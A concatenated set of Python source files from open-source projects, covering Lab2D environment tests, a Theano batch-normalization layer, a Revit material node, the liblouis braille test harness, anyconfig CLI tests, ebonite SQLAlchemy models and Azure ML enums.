env = self._create_env({'steps': '5'})
properties = env.list_property('')
self.assertLen(properties, 1)
self.assertEqual(properties[0],
('steps', dmlab2d.PropertyAttribute.READABLE_WRITABLE))
self.assertEqual(env.read_property('steps'), '5')
env.write_property('steps', '3')
self.assertEqual(env.read_property('steps'), '3')
env.start(episode=0, seed=0)
for _ in range(2):
self.assertEqual(env.advance()[0], dmlab2d.RUNNING)
self.assertEqual(env.advance()[0], dmlab2d.TERMINATED)
def test_lab2d_act_discrete(self):
env = self._create_env({'steps': '5'})
env.start(episode=0, seed=0)
env.act_discrete(np.array([2], np.dtype('int32')))
_, reward = env.advance()
self.assertEqual(reward, 2)
def test_lab2d_act_continuous(self):
env = self._create_env({'steps': '5'})
env.start(episode=0, seed=0)
np.testing.assert_array_equal(env.observation('VIEW3'), [1, 2, 3])
env.act_continuous([10])
env.advance()
np.testing.assert_array_equal(env.observation('VIEW3'), [11, 12, 13])
def test_lab2d_act_text(self):
env = self._create_env({'steps': '5'})
env.start(episode=0, seed=0)
view = env.observation('VIEW5')
self.assertEqual(view, b'')
env.act_text(['Hello'])
env.advance()
view = env.observation('VIEW5')
self.assertEqual(view, b'Hello')
def test_lab2d_invalid_setting(self):
with self.assertRaises(ValueError):
self._create_env({'missing': '5'})
def test_lab2d_bad_action_spec_name(self):
env = self._create_env()
with self.assertRaises(KeyError):
env.action_discrete_spec('bad_key')
with self.assertRaises(KeyError):
env.action_continuous_spec('bad_key')
def test_lab2d_bad_observation_spec_name(self):
env = self._create_env()
with self.assertRaises(KeyError):
env.observation_spec('bad_key')
def test_lab2d_observe_before_start(self):
env = self._create_env()
with self.assertRaises(RuntimeError):
env.observation('VIEW1')
def test_lab2d_act_before_start(self):
env = self._create_env()
with self.assertRaises(RuntimeError):
env.act_discrete([0])
with self.assertRaises(RuntimeError):
env.act_continuous([0])
with self.assertRaises(RuntimeError):
env.act_text([''])
def test_lab2d_act_bad_shape(self):
env = self._create_env()
env.start(0, 0)
with self.assertRaises(ValueError):
env.act_discrete([0, 1])
with self.assertRaises(ValueError):
env.act_continuous([0, 1])
def test_lab2d_advance_after_episode_ends(self):
env = self._create_env({'steps': '2'})
env.start(0, 0)
self.assertEqual(env.advance()[0], dmlab2d.RUNNING)
self.assertEqual(env.advance()[0], dmlab2d.TERMINATED)
with self.assertRaises(RuntimeError):
env.advance()
def test_lab2d_missing_properties(self):
env = self._create_env({'steps': '5'})
with self.assertRaises(KeyError):
env.list_property('missing')
with self.assertRaises(KeyError):
env.read_property('missing')
with self.assertRaises(KeyError):
env.write_property('missing', '10')
def test_lab2d_invalid_ops_properties(self):
env = self._create_env({'steps': '5'})
with self.assertRaises(ValueError):
env.list_property('steps')
with self.assertRaises(ValueError):
env.write_property('steps', 'mouse')
if __name__ == '__main__':
absltest.main()
|
mozi/layers/normalization.py | hycis/Mozi | 122 | 12798961 | <gh_stars>100-1000
from mozi.layers.template import Template
from mozi.utils.theano_utils import shared_zeros, sharedX, shared_ones
from mozi.weight_init import UniformWeight
import theano.tensor as T
import theano
class BatchNormalization(Template):
def __init__(self, dim, layer_type, gamma_init=UniformWeight(), short_memory=0.01):
'''
REFERENCE:
Batch Normalization: Accelerating Deep Network Training by Reducing Internal Covariate Shift
PARAMS:
short_memory: short term memory
                y_t is the latest value; the moving average x_tp1 is calculated as
                x_tp1 = memory * y_t + (1-memory) * x_t. The larger the short-term
                memory, the more weight is put on the most recent value.
layer_type: fc or conv
epsilon:
denominator min value for preventing division by zero in computing std
dim: for fc layers, shape is the layer dimension, for conv layers,
shape is the number of feature maps
'''
assert layer_type in ['fc', 'conv']
self.layer_type = layer_type
self.epsilon = 1e-6
self.dim = dim
self.mem = short_memory
if self.layer_type == 'fc':
input_shape = (1, dim)
self.broadcastable = (True, False)
elif self.layer_type == 'conv':
input_shape = (1, dim, 1, 1)
self.broadcastable = (True, False, True, True)
self.gamma = gamma_init(input_shape, name='gamma')
self.beta = shared_zeros(input_shape, name='beta')
self.params = [self.gamma, self.beta]
self.moving_mean = 0
self.moving_var = 1
def _train_fprop(self, state_below):
if self.layer_type == 'fc':
miu = state_below.mean(axis=0)
var = T.mean((state_below - miu)**2, axis=0)
elif self.layer_type == 'conv':
miu = state_below.mean(axis=(0,2,3), keepdims=True)
var = T.mean((state_below - miu)**2, axis=(0,2,3), keepdims=True)
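        # Exponential moving average of the batch statistics, as described in the
        # docstring: new = mem * batch_stat + (1 - mem) * old.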
self.moving_mean = self.mem * miu + (1-self.mem) * self.moving_mean
self.moving_var = self.mem * var + (1-self.mem) * self.moving_var
Z = (state_below - self.moving_mean) / T.sqrt(self.moving_var + self.epsilon)
gamma = T.patternbroadcast(self.gamma, self.broadcastable)
beta = T.patternbroadcast(self.beta, self.broadcastable)
return gamma * Z + beta
def _test_fprop(self, state_below):
Z = (state_below - self.moving_mean) / T.sqrt(self.moving_var + self.epsilon)
gamma = T.patternbroadcast(self.gamma, self.broadcastable)
beta = T.patternbroadcast(self.beta, self.broadcastable)
return gamma * Z + beta
def _layer_stats(self, state_below, layer_output):
return [('moving_mean', T.mean(self.moving_mean)),
('moving_std', T.mean(self.moving_var)),
('gamma_mean', T.mean(self.gamma)),
('beta_mean', T.mean(self.beta)),
('gamma_max', T.max(self.gamma))]
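# Usage sketch (hypothetical model object; assumes Mozi's sequential-style add() API):
#   model.add(BatchNormalization(dim=512, layer_type='fc'))
#   model.add(BatchNormalization(dim=64, layer_type='conv'))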
# class LRN(Template):
# """
# Adapted from pylearn2
# Local Response Normalization
# """
#
# def __init__(self, n=5, alpha=0.0001, beta=0.75, k=2):
# super(LRN, self).__init__()
# self.n = n
# self.alpha = alpha
# self.beta = beta
# self.k = k
# assert self.n % 2 == 1, 'only odd n is supported'
#
# def _train_fprop(self, state_below):
# half = self.n / 2
# sq = T.sqr(state_below)
# b, ch, r, c = state_below.shape
# extra_channels = T.alloc(0., b, ch + 2*half, r, c)
# sq = T.set_subtensor(extra_channels[:,half:half+ch,:,:], sq)
# scale = self.k
#
# for i in xrange(self.n):
# scale += self.alpha * sq[:,i:i+ch,:,:]
#
# scale = scale ** self.beta
# return state_below / scale
#
# def _test_fprop(self, state_below):
# return self._train_fprop(state_below)
|
nodes/1.x/python/Material.Properties.py | jdehotin/Clockworkfordynamo | 147 | 12799027 | <gh_stars>100-1000
import clr
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import *
mats = UnwrapElement(IN[0])
colorlist = list()
glowlist = list()
classlist = list()
shinylist = list()
smoothlist = list()
translist = list()
for mat in mats:
colorlist.append(mat.Color)
if mat.Glow:
glowlist.append(True)
else:
glowlist.append(False)
classlist.append(mat.MaterialClass)
shinylist.append(mat.Shininess)
smoothlist.append(mat.Smoothness)
translist.append(mat.Transparency)
OUT = (classlist,colorlist,glowlist,shinylist,smoothlist,translist) |
third_party/liblouis/src/tests/harness/runHarness.py | zipated/src | 2,151 | 12799073 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Liblouis test harness
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
#
# Copyright (c) 2012, liblouis team, <NAME>.
"""Liblouis test harness:
Please see the liblouis documentation for information on how to add a new harness or more tests for your braille table.
@author: <NAME> <<EMAIL>>
@author: <NAME> <<EMAIL>>
@author: <NAME> <<EMAIL>>
"""
import json
import os
import sys
import traceback
from glob import iglob
from louis import translate, backTranslateString, hyphenate
from louis import noContractions, compbrlAtCursor, dotsIO, comp8Dots, pass1Only, compbrlLeftCursor, otherTrans, ucBrl
try:
from nose.plugins import Plugin
from nose import run
except ImportError:
sys.stderr.write("The harness tests require nose. Skipping...\n")
sys.exit(0)
### Nosetest plugin for controlling the output format. ###
class Reporter(Plugin):
name = 'reporter'
def __init__(self):
super(Reporter, self).__init__()
self.res = []
self.stream = None
def setOutputStream(self, stream):
# grab for own use
self.stream = stream
# return dummy stream
class dummy:
def write(self, *arg):
pass
def writeln(self, *arg):
pass
def flush(self):
pass
d = dummy()
return d
def addError(self, test, err):
exctype, value, tb = err
errMsg = ''.join(traceback.format_exception(exctype, value, tb))
self.res.append("--- Error: ---\n%s\n--- end ---\n" % errMsg)
def addFailure(self, test, err):
exctype, value, tb = err
#errMsg = ''.join(traceback.format_exception(exctype, value, None))
self.res.append("%s\n" % value)
def finalize(self, result):
failures=len(result.failures)
errors=len(result.errors)
total=result.testsRun
percent_string = " ({percent}% success)".format(percent=round((total-failures-errors+0.0)/total*100,2)) if total > 0 else ""
self.res.append("Ran {total} tests{percent_string}, with {failures} failures and {errors} errors.\n".format(total=total, percent_string=percent_string, failures=failures, errors=errors))
self.stream.write("\n".join(self.res))
### End of nosetest plugin for controlling the output format. ###
PY2 = sys.version_info[0] == 2
def u(a):
if PY2:
return a.encode("utf-8")
return a
modes = {
'noContractions': noContractions,
'compbrlAtCursor': compbrlAtCursor,
'dotsIO': dotsIO,
'comp8Dots': comp8Dots,
'pass1Only': pass1Only,
'compbrlLeftCursor': compbrlLeftCursor,
'otherTrans': otherTrans,
'ucBrl': ucBrl
}
def showCurPos(length, pos1, marker1="^", pos2=None, marker2="*"):
"""A helper function to make a string to show the position of the given cursor."""
display = [" "] *length
display[pos1] = marker1
if pos2:
display[pos2] = marker2
return "".join(display)
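# For example, showCurPos(6, 1) returns " ^    " and showCurPos(6, 1, pos2=4) returns " ^  * ".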
class BrailleTest():
def __init__(self, harnessName, tables, input, output, outputUniBrl=False, mode=0, cursorPos=None, brlCursorPos=None, testmode='translate', comment=[]):
self.harnessName = harnessName
self.tables = tables
if outputUniBrl:
self.tables.insert(0, 'unicode.dis')
self.input = input
self.expectedOutput = output
self.mode = mode if not mode else modes[mode]
self.cursorPos = cursorPos
self.expectedBrlCursorPos = brlCursorPos
self.comment = comment
self.testmode = testmode
def __str__(self):
return "%s" % self.harnessName
def hyphenateword(self, tables, word, mode):
# FIXME: liblouis currently crashes if we dont add space at end of the word, probably due to a counter running past the end of the string.
# medium/longterm this hack should be removed, and the root of the problem found/resolved.
hyphen_mask=hyphenate(tables, word+' ', mode)
# FIXME: why on python 2 do we need to remove the last item, and on python3 it is needed?
# i.e. in python2 word and hyphen_mask not of the same length.
if PY2:
return "".join( map(lambda a,b: "-"+a if b=='1' else a, word, hyphen_mask)[:-1] )
else:
return "".join( list(map(lambda a,b: "-"+a if b=='1' else a, word, hyphen_mask)) )
def check_translate(self):
if self.cursorPos is not None:
tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode, cursorPos=self.cursorPos)
else:
tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode)
template = "%-25s '%s'"
tBrlCurPosStr = showCurPos(len(tBrl), tBrlCurPos)
report = [
"--- Braille Difference Failure: %s ---" % self.__str__(),
template % ("comment:", "".join(self.comment)),
template % ("input:", self.input),
template % ("expected brl:", self.expectedOutput),
template % ("actual brl:", tBrl),
"--- end ---",
]
assert tBrl == self.expectedOutput, u("\n".join(report))
def check_backtranslate(self):
backtranslate_output = backTranslateString(self.tables, self.input, None, mode=self.mode)
template = "%-25s '%s'"
report = [
"--- Backtranslate failure: %s ---" % self.__str__(),
template % ("comment:", "".join(self.comment)),
template % ("input:", self.input),
template % ("expected text:", self.expectedOutput),
template % ("actual backtranslated text:", backtranslate_output),
"--- end ---",
]
assert backtranslate_output == self.expectedOutput, u("\n".join(report))
def check_cursor(self):
tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode, cursorPos=self.cursorPos)
template = "%-25s '%s'"
etBrlCurPosStr = showCurPos(len(tBrl), tBrlCurPos, pos2=self.expectedBrlCursorPos)
report = [
"--- Braille Cursor Difference Failure: %s ---" %self.__str__(),
template % ("comment:", "".join(self.comment)),
template % ("input:", self.input),
template % ("received brl:", tBrl),
template % ("BRLCursorAt %d expected %d:" %(tBrlCurPos, self.expectedBrlCursorPos),
etBrlCurPosStr),
"--- end ---"
]
assert tBrlCurPos == self.expectedBrlCursorPos, u("\n".join(report))
def check_hyphenate(self):
hyphenated_word = self.hyphenateword(self.tables, self.input, mode=self.mode)
template = "%-25s '%s'"
report = [
"--- Hyphenation failure: %s ---" % self.__str__(),
template % ("input:", self.input),
template % ("expected hyphenated word:", self.expectedOutput),
template % ("actual hyphenated word:", hyphenated_word),
"--- end ---",
]
assert hyphenated_word == self.expectedOutput, u("\n".join(report))
def test_allCases():
if 'HARNESS_DIR' in os.environ:
# we assume that if HARNESS_DIR is set that we are invoked from
# the Makefile, i.e. all the paths to the Python test files and
# the test tables are set correctly.
harness_dir = os.environ['HARNESS_DIR']
else:
# we are not invoked via the Makefile, i.e. we have to set up the
# paths (LOUIS_TABLEPATH) manually.
harness_dir = "."
# make sure local test braille tables are found
os.environ['LOUIS_TABLEPATH'] = '../tables,../../tables'
testfiles=[]
if len(sys.argv)>1:
# grab the test files from the arguments
for test_file in sys.argv[1:]:
testfiles.extend(iglob(os.path.join(harness_dir, test_file)))
else:
# Process all *_harness.txt files in the harness directory.
testfiles=iglob(os.path.join(harness_dir, '*_harness.txt'))
for harness in testfiles:
f = open(harness, 'r')
try:
harnessModule = json.load(f, encoding="UTF-8")
except ValueError as e:
raise ValueError("%s doesn't look like a harness file, %s" %(harness, e.message))
f.close()
tableList = []
if isinstance(harnessModule['tables'], list):
tableList.extend(harnessModule['tables'])
else:
tableList.append(harnessModule['tables'])
origflags = {'testmode':'translate'}
for section in harnessModule['tests']:
flags = origflags.copy()
flags.update(section.get('flags', {}))
for testData in section['data']:
test = flags.copy()
testTables = tableList[:]
test.update(testData)
bt = BrailleTest(harness, testTables, **test)
if test['testmode'] == 'translate':
yield bt.check_translate
if 'cursorPos' in test:
yield bt.check_cursor
if test['testmode'] == 'backtranslate':
yield bt.check_backtranslate
if test['testmode'] == 'hyphenate':
yield bt.check_hyphenate
if __name__ == '__main__':
result = run(addplugins=[Reporter()], argv=['-v', '--with-reporter', sys.argv[0]], defaultTest=__name__)
# FIXME: Ideally the harness tests should return the result of the
# tests. However since there is no way to mark a test as expected
# failure ATM we would have to disable a whole file of tests. So,
# for this release we will pretend all tests succeeded and will
# add a @expected_test feature for the next release. See also
# http://stackoverflow.com/questions/9613932/nose-plugin-for-expected-failures
result = True
sys.exit(0 if result else 1)
|
tests/cli/test_base.py | ssato/python-anyconfig | 213 | 12799082 | #
# Copyright (C) 2013 - 2021 <NAME> <<EMAIL>>
# License: MIT
#
# pylint: disable=missing-docstring
"""test cases for anyconfig.cli module.
"""
import contextlib
import io
import pathlib
import sys
import tempfile
import unittest
import anyconfig.api
import anyconfig.cli as TT
from .. import base
from . import collectors, datatypes
def make_args(_self, tdata):
"""Make arguments to run cli.main.
"""
return ['anyconfig_cli'] + tdata.opts + [str(tdata.inp_path)]
class BaseTestCase(unittest.TestCase):
"""Base Test case.
"""
collector = collectors.Collector()
make_args = make_args
def setUp(self):
if self.collector:
self.collector.init()
def post_checks(self, tdata, *args, **kwargs):
"""Placeholder to do more post checks.
"""
pass
def _run_main(self, tdata):
"""Wrapper for cli.main."""
args = self.make_args(tdata)
if tdata.outname: # Running cli.main will output files.
self.assertTrue(
tdata.ref is not None,
                f'No reference data was given, {tdata!r}'
)
with tempfile.TemporaryDirectory() as tdir:
opath = pathlib.Path(tdir) / tdata.outname
# Run anyconfig.cli.main with arguments.
TT.main(args + ['-o', str(opath)])
if tdata.exp.exit_code_matches and tdata.exp.exit_code == 0:
self.assertTrue(opath.exists(), str(opath))
try:
odata = anyconfig.api.load(opath, **tdata.oo_opts)
except anyconfig.api.UnknownFileTypeError:
odata = anyconfig.api.load(opath, ac_parser='json')
self.assertEqual(odata, tdata.ref, repr(tdata))
self.post_checks(tdata, opath)
else:
# Likewise but without -o <output_path> option.
TT.main(args)
self.post_checks(tdata)
sys.exit(0)
def run_main(self, tdata) -> None:
"""
Run anyconfig.cli.main and check if the exit code was expected one.
"""
expected: datatypes.Expected = tdata.exp
with self.assertRaises(expected.exception, msg=repr(tdata)) as ctx:
with contextlib.redirect_stdout(io.StringIO()) as stdout:
with contextlib.redirect_stderr(io.StringIO()) as stderr:
self._run_main(tdata)
exc = ctx.exception
self.assertTrue(isinstance(exc, expected.exception))
ecode = getattr(exc, 'error_code', getattr(exc, 'code', 1))
if expected.exit_code_matches:
self.assertEqual(ecode, expected.exit_code, f'{tdata!r}')
else:
self.assertNotEqual(ecode, expected.exit_code, f'{tdata!r}')
if expected.words_in_stdout:
msg = stdout.getvalue()
self.assertTrue(expected.words_in_stdout in msg, msg)
if expected.words_in_stderr:
err = stderr.getvalue()
self.assertTrue(expected.words_in_stderr in err, err)
def test_runs_for_datasets(self) -> None:
if self.collector and self.collector.initialized:
if self.collector.kind == base.TDataCollector.kind:
return
for tdata in self.collector.each_data():
self.run_main(tdata)
class NoInputTestCase(BaseTestCase):
"""Test cases which does not require inputs.
"""
def make_args(self, tdata): # pylint: disable=no-self-use
"""Make arguments to run cli.main.
"""
return ['anyconfig_cli'] + tdata.opts
# vim:sw=4:ts=4:et:
|
src/ebonite/ext/sqlalchemy/models.py | zyfra/ebonite | 270 | 12799124 | from abc import abstractmethod
from typing import Any, Dict, Iterable, List, Optional, Type, TypeVar
from pyjackson import dumps, loads
from sqlalchemy import Column, DateTime, ForeignKey, Integer, String, Text, UniqueConstraint
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from ebonite.core.objects import DatasetType
from ebonite.core.objects.artifacts import ArtifactCollection
from ebonite.core.objects.core import (Buildable, EvaluationResults, EvaluationSet, Image, Model, Pipeline,
PipelineStep, Project, RuntimeEnvironment, RuntimeInstance, Task)
from ebonite.core.objects.dataset_source import DatasetSource
from ebonite.core.objects.metric import Metric
from ebonite.core.objects.requirements import Requirements
SQL_OBJECT_FIELD = '_sqlalchemy_object'
def json_column():
return Column(Text)
def safe_loads(payload, as_class):
return loads(payload, Optional[as_class])
def sqlobject(obj):
return getattr(obj, SQL_OBJECT_FIELD, None)
def update_attrs(obj, **attrs):
for name, value in attrs.items():
setattr(obj, name, value)
T = TypeVar('T')
S = TypeVar('S', bound='Attaching')
class Attaching:
id = ...
name = ...
def attach(self, obj):
setattr(obj, SQL_OBJECT_FIELD, self)
return obj
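    # from_obj keeps a domain object and its SQLAlchemy row in sync: if the object
    # already carries an attached row (and new is False) the row's columns are
    # updated in place, otherwise a fresh row is created from get_kwargs().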
@classmethod
def from_obj(cls: Type[S], obj: T, new=False) -> S:
kwargs = cls.get_kwargs(obj)
existing = sqlobject(obj)
if not new and existing is not None:
update_attrs(existing, **kwargs)
return existing
return cls(**kwargs)
@classmethod
@abstractmethod
def get_kwargs(cls, obj: T) -> dict:
pass # pragma: no cover
@abstractmethod
def to_obj(self) -> T:
pass # pragma: no cover
Base = declarative_base()
class SProject(Base, Attaching):
__tablename__ = 'projects'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=True, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
tasks: Iterable['STask'] = relationship("STask", back_populates="project")
def to_obj(self) -> Project:
p = Project(self.name, id=self.id, author=self.author, creation_date=self.creation_date)
for task in self.tasks:
p._tasks.add(task.to_obj())
return self.attach(p)
@classmethod
def get_kwargs(cls, project: Project) -> dict:
return dict(id=project.id,
name=project.name,
author=project.author,
creation_date=project.creation_date,
tasks=[STask.from_obj(t) for t in project.tasks.values()])
class STask(Base, Attaching):
__tablename__ = 'tasks'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
project_id = Column(Integer, ForeignKey('projects.id'), nullable=False)
project = relationship("SProject", back_populates="tasks")
models: Iterable['SModel'] = relationship("SModel", back_populates="task")
pipelines: Iterable['SPipeline'] = relationship("SPipeline", back_populates='task')
images: Iterable['SImage'] = relationship("SImage", back_populates='task')
datasets = Column(Text)
metrics = Column(Text)
evaluation_sets = Column(Text)
__table_args__ = (UniqueConstraint('name', 'project_id', name='tasks_name_and_ref'),)
def to_obj(self) -> Task:
task = Task(id=self.id,
name=self.name,
author=self.author,
creation_date=self.creation_date,
project_id=self.project_id,
datasets=safe_loads(self.datasets, Dict[str, DatasetSource]),
metrics=safe_loads(self.metrics, Dict[str, Metric]),
evaluation_sets=safe_loads(self.evaluation_sets, Dict[str, EvaluationSet]))
for model in self.models:
task._models.add(model.to_obj())
for pipeline in self.pipelines:
task._pipelines.add(pipeline.to_obj())
for image in self.images:
task._images.add(image.to_obj())
return self.attach(task)
@classmethod
def get_kwargs(cls, task: Task) -> dict:
return dict(id=task.id,
name=task.name,
author=task.author,
creation_date=task.creation_date,
project_id=task.project_id,
models=[SModel.from_obj(m) for m in task.models.values()],
images=[SImage.from_obj(i) for i in task.images.values()],
pipelines=[SPipeline.from_obj(p) for p in task.pipelines.values()],
datasets=dumps(task.datasets),
metrics=dumps(task.metrics),
evaluation_sets=dumps(task.evaluation_sets))
class SModel(Base, Attaching):
__tablename__ = 'models'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
wrapper = Column(Text)
artifact = Column(Text)
requirements = Column(Text)
description = Column(Text)
params = Column(Text)
task_id = Column(Integer, ForeignKey('tasks.id'), nullable=False)
task = relationship("STask", back_populates="models")
evaluations = Column(Text)
__table_args__ = (UniqueConstraint('name', 'task_id', name='models_name_and_ref'),)
def to_obj(self) -> Model:
model = Model(name=self.name,
wrapper_meta=safe_loads(self.wrapper, dict),
author=self.author,
creation_date=self.creation_date,
artifact=safe_loads(self.artifact, ArtifactCollection),
requirements=safe_loads(self.requirements, Requirements),
description=self.description,
params=safe_loads(self.params, Dict[str, Any]),
id=self.id,
task_id=self.task_id,
evaluations=safe_loads(self.evaluations, Dict[str, EvaluationResults]))
return self.attach(model)
@classmethod
def get_kwargs(cls, model: Model) -> dict:
return dict(id=model.id,
name=model.name,
author=model.author,
creation_date=model.creation_date,
wrapper=dumps(model.wrapper_meta),
artifact=dumps(model.artifact),
requirements=dumps(model.requirements),
description=model.description,
params=dumps(model.params),
task_id=model.task_id,
evaluations=dumps(model.evaluations))
class SPipeline(Base, Attaching):
__tablename__ = 'pipelines'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
steps = Column(Text)
input_data = Column(Text)
output_data = Column(Text)
task_id = Column(Integer, ForeignKey('tasks.id'), nullable=False)
task = relationship("STask", back_populates="pipelines")
evaluations = Column(Text)
__table_args__ = (UniqueConstraint('name', 'task_id', name='pipelines_name_and_ref'),)
def to_obj(self) -> Pipeline:
pipeline = Pipeline(name=self.name,
steps=safe_loads(self.steps, List[PipelineStep]),
input_data=safe_loads(self.input_data, DatasetType),
output_data=safe_loads(self.output_data, DatasetType),
author=self.author,
creation_date=self.creation_date,
id=self.id,
task_id=self.task_id,
evaluations=safe_loads(self.evaluations, EvaluationResults))
return self.attach(pipeline)
@classmethod
def get_kwargs(cls, pipeline: Pipeline) -> dict:
return dict(id=pipeline.id,
name=pipeline.name,
author=pipeline.author,
creation_date=pipeline.creation_date,
steps=dumps(pipeline.steps),
input_data=dumps(pipeline.input_data),
output_data=dumps(pipeline.output_data),
task_id=pipeline.task_id,
evaluations=dumps(pipeline.evaluations))
class SImage(Base, Attaching):
__tablename__ = 'images'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
task_id = Column(Integer, ForeignKey('tasks.id'), nullable=False)
task = relationship("STask", back_populates="images")
environment_id = Column(Integer, ForeignKey('environments.id'), nullable=False)
params = Column(Text)
source = Column(Text)
__table_args__ = (UniqueConstraint('name', 'task_id', name='image_name_and_ref'),)
def to_obj(self) -> Image:
image = Image(name=self.name,
author=self.author,
creation_date=self.creation_date,
id=self.id,
task_id=self.task_id,
params=safe_loads(self.params, Image.Params),
source=safe_loads(self.source, Buildable),
environment_id=self.environment_id)
return self.attach(image)
@classmethod
def get_kwargs(cls, image: Image) -> dict:
return dict(id=image.id,
name=image.name,
author=image.author,
creation_date=image.creation_date,
task_id=image.task_id,
params=dumps(image.params),
source=dumps(image.source),
environment_id=image.environment_id)
class SRuntimeEnvironment(Base, Attaching):
__tablename__ = 'environments'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=True, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
params = Column(Text)
def to_obj(self) -> RuntimeEnvironment:
environment = RuntimeEnvironment(
name=self.name,
author=self.author,
creation_date=self.creation_date,
id=self.id,
params=safe_loads(self.params, RuntimeEnvironment.Params))
return self.attach(environment)
@classmethod
def get_kwargs(cls, environment: RuntimeEnvironment) -> dict:
return dict(id=environment.id,
name=environment.name,
author=environment.author,
creation_date=environment.creation_date,
params=dumps(environment.params))
class SRuntimeInstance(Base, Attaching):
__tablename__ = 'instances'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
image_id = Column(Integer, ForeignKey('images.id'), nullable=False)
environment_id = Column(Integer, ForeignKey('environments.id'), nullable=False)
params = Column(Text)
__table_args__ = (UniqueConstraint('name', 'image_id', 'environment_id', name='instance_name_and_ref'),)
def to_obj(self) -> RuntimeInstance:
instance = RuntimeInstance(
name=self.name,
author=self.author,
creation_date=self.creation_date,
id=self.id,
image_id=self.image_id,
environment_id=self.environment_id,
params=safe_loads(self.params, RuntimeInstance.Params))
return self.attach(instance)
@classmethod
def get_kwargs(cls, instance: RuntimeInstance) -> dict:
return dict(id=instance.id,
name=instance.name,
author=instance.author,
creation_date=instance.creation_date,
image_id=instance.image_id,
environment_id=instance.environment_id,
params=dumps(instance.params))
|
sdk/machinelearning/azure-mgmt-machinelearningservices/azure/mgmt/machinelearningservices/models/_azure_machine_learning_workspaces_enums.py | rsdoherty/azure-sdk-for-python | 2,728 | 12799223 | <filename>sdk/machinelearning/azure-mgmt-machinelearningservices/azure/mgmt/machinelearningservices/models/_azure_machine_learning_workspaces_enums.py
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class _CaseInsensitiveEnumMeta(EnumMeta):
def __getitem__(self, name):
return super().__getitem__(name.upper())
def __getattr__(cls, name):
"""Return the enum member matching `name`
We use __getattr__ instead of descriptors or inserting into the enum
class' __dict__ in order to support `name` and `value` being both
properties for enum members (which live in the class' __dict__) and
enum members themselves.
"""
try:
return cls._member_map_[name.upper()]
except KeyError:
raise AttributeError(name)
class AllocationState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Allocation state of the compute. Possible values are: steady - Indicates that the compute is
not resizing. There are no changes to the number of compute nodes in the compute in progress. A
compute enters this state when it is created and when no operations are being performed on the
compute to change the number of compute nodes. resizing - Indicates that the compute is
resizing; that is, compute nodes are being added to or removed from the compute.
"""
STEADY = "Steady"
RESIZING = "Resizing"
class ApplicationSharingPolicy(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Policy for sharing applications on this compute instance among users of parent workspace. If
Personal, only the creator can access applications on this compute instance. When Shared, any
workspace user can access applications on this instance depending on his/her assigned role.
"""
PERSONAL = "Personal"
SHARED = "Shared"
class BillingCurrency(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Three lettered code specifying the currency of the VM price. Example: USD
"""
USD = "USD"
class ComputeInstanceState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Current state of a ComputeInstance.
"""
CREATING = "Creating"
CREATE_FAILED = "CreateFailed"
DELETING = "Deleting"
RUNNING = "Running"
RESTARTING = "Restarting"
JOB_RUNNING = "JobRunning"
SETTING_UP = "SettingUp"
SETUP_FAILED = "SetupFailed"
STARTING = "Starting"
STOPPED = "Stopped"
STOPPING = "Stopping"
USER_SETTING_UP = "UserSettingUp"
USER_SETUP_FAILED = "UserSetupFailed"
UNKNOWN = "Unknown"
UNUSABLE = "Unusable"
class ComputeType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The type of compute
"""
AKS = "AKS"
AML_COMPUTE = "AmlCompute"
COMPUTE_INSTANCE = "ComputeInstance"
DATA_FACTORY = "DataFactory"
VIRTUAL_MACHINE = "VirtualMachine"
HD_INSIGHT = "HDInsight"
DATABRICKS = "Databricks"
DATA_LAKE_ANALYTICS = "DataLakeAnalytics"
class EncryptionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Indicates whether or not the encryption is enabled for the workspace.
"""
ENABLED = "Enabled"
DISABLED = "Disabled"
class NodeState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""State of the compute node. Values are idle, running, preparing, unusable, leaving and
preempted.
"""
IDLE = "idle"
RUNNING = "running"
PREPARING = "preparing"
